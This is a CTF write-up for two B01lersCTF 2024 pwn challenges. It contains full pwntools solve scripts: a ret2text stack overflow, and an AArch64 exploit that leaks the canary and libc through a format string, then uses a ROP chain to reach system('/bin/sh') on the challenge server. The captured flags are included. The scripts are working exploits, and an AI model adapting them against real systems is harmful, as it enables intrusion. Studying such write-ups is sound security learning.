B01lersCTF 2024
pwn
shall-we-play-a-game
ret2text，没有什么好说的。
from pwn import *
# Solve script for the B01lersCTF 2024 pwn challenge "shall-we-play-a-game".
# Per the writeup this is a plain ret2text: the overflowed return address is
# pointed at a function that already exists in the binary.
context(arch='amd64', os='linux', log_level='debug')
file = './shall-we-play-a-game'
elf = ELF(file)
p = process(file)  # local run; the remote target below is kept but commented out
link = 'gold.b01le.rs 4004'.split()
# p = remote(link[0], link[1])
# Short aliases for the pwntools I/O helpers (standard writeup boilerplate).
pa = lambda : pause()
s = lambda x : success(x)
re = lambda m, t : p.recv(numb=m, timeout=t)  # NOTE: shadows the stdlib `re` module name
ru = lambda x : p.recvuntil(x)
rl = lambda : p.recvline()
sd = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
ia = lambda : p.interactive()
sla = lambda a, b : p.sendlineafter(a, b)
sa = lambda a, b : p.sendafter(a, b)
uu32 = lambda x : u32(x.ljust(4,b'\x00'))
uu64 = lambda x : u64(x.ljust(8,b'\x00'))
# Three menu inputs are sent blind before the overflowing input; what each '1'
# selects is not visible from this script.
sl(b'1')
sl(b'1')
sl(b'1')
# 0x48 bytes of filler followed by the target address. Presumably 0x40 bytes of
# buffer plus the saved rbp, with the saved return address right after — the
# frame layout itself is not shown here. elf.sym is used without a load base,
# so the binary is assumed non-PIE.
sl(cyclic(0x40+0x8)+p64(elf.sym.global_thermo_nuclear_war))
ia()
#bctf{h0w_@bo0ut_a_n1ce_g@m3_0f_ch3ss?_ccb7a268f1324c84}
arm-and-a-leg
第一道armpwn
很走运，这次刚好本地环境是 22.04，和云端相同。24 马上就要出了，下次就不一定有这么好运气了。
一道 ret2libc，但是有 canary。由于 armpwn 不像 x86/x64 那样有较多的 gadget 可用，只能像打 ret2csu 一样，最后还是在 libc 里找的 gadget。
from pwn import *
# Solve script for the B01lersCTF 2024 pwn challenge "arm-and-a-leg" (AArch64).
# Per the writeup: ret2libc on a binary protected by a stack canary. The canary
# and a libc pointer are read back through a format-string leak, and the ROP
# gadgets come from libc because the binary itself offers few usable ones.
context(arch='aarch64', os='linux')
# context.log_level='debug'
file = './arm-and-a-leg'
elf = ELF(file)
libc = ELF('./libc.so.6_arm22')  # libc matching the remote (Ubuntu 22.04 per the writeup)
link = 'arm-and-a-leg.gold.b01le.rs 1337'.split()
p = remote(link[0], link[1])
# Short aliases for the pwntools I/O helpers (standard writeup boilerplate).
pa = lambda : pause()
s = lambda x : success(x)
re = lambda m, t : p.recv(numb=m, timeout=t)  # NOTE: shadows the stdlib `re` module name
ru = lambda x : p.recvuntil(x)
rl = lambda : p.recvline()
sd = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
ia = lambda : p.interactive()
sla = lambda a, b : p.sendlineafter(a, b)
sa = lambda a, b : p.sendafter(a, b)
uu32 = lambda x : u32(x.ljust(4,b'\x00'))
uu64 = lambda x : u64(x.ljust(8,b'\x00'))
sl(b'1')
sl(b'1337')
# Format-string leak: the input is echoed back through printf, so stack slots 15
# and 21 are printed as pointers, '-' separated, with 'here' as an end marker.
sl(b'%15$p-%21$phere')
ru(b'we will ship to: ')
addr = p.recvuntil(b'here', drop=1).split(b'-')
canary = int(addr[0],16)  # slot 15: the stack canary
# slot 21: a pointer into libc; 0x274cc is its offset from the libc base for
# this particular libc build (libc-specific, found by the author).
libc_base = int(addr[1],16)-0x274cc
s('canary: %s, libc_base: %s'%(hex(canary), hex(libc_base)))
# Gadget disassembly as recorded by the author:
# 0x0000000000046d64 : ldp x21, x30, [sp, #0x10] ; ldp x19, x20, [sp], #0x30 ; ret
# 0x00000000000e3720 : mov x0, x20 ; blr x21
system = libc_base + libc.sym.system
gadget1 = libc_base + 0x0000000000046d64  # pops x19/x20/x21/x30 from the stack (see above)
gadget2 = libc_base + 0x00000000000e3720  # x0 = x20, then calls x21
# Hard-coded offset of a "/bin/sh" string in this libc; not resolved via
# libc.search, so it is tied to the same libc build as the leak offset above.
binsh = libc_base + 0x00014CD10
# ROP chain. The exact frame layout (where the canary and saved x30 sit) is not
# visible from this script; the padding is written with the leaked canary value
# so the real canary slot is restored with the correct value.
exp = flat(
p64(canary)*15, # 120 bytes of padding; filled with the canary instead of tuning the exact offset
p64(gadget1),
p64(canary)*3,
p64(binsh),
p64(system),
p64(gadget2)
)
print(len(exp))  # debug: payload length
sl(exp)
ia()
# bctf{c0st_y@_@n_ARM_@nd_a_l3g!_a1659d0e634100240e6}
B01lersCTF 2024
https://m0rn1ng.pages.dev/posts/b01lersctf-2024/